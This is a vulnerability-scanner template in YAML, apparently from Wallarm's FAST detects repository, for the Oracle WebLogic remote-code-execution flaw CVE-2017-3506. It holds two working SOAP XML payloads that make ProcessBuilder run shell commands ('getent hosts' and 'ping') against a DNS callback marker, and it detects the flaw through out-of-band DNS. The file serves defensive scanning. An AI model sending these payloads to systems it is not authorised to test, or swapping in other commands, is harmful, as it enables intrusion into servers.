forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2017-3506.yaml
27 lines (24 loc) · 1.47 KB
/
CVE-2017-3506.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
send:
- method: 'POST'
url: '/wls-wsat/CoordinatorPortType'
headers:
- CONTENT-TYPE: text/xml
body: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void><void index="2"><string>getent hosts DNS_MARKER</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
- method: 'POST'
url: '/wls-wsat/CoordinatorPortType'
headers:
- CONTENT-TYPE: text/xml
body: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>ping -n 1 DNS_MARKER</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
detect:
- oob:
- dns
meta-info:
- type: rce
- threat: 74
- applicable_for:
- fast
- scanner
- tags:
- RCE
- CVE-2017-3506
- Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2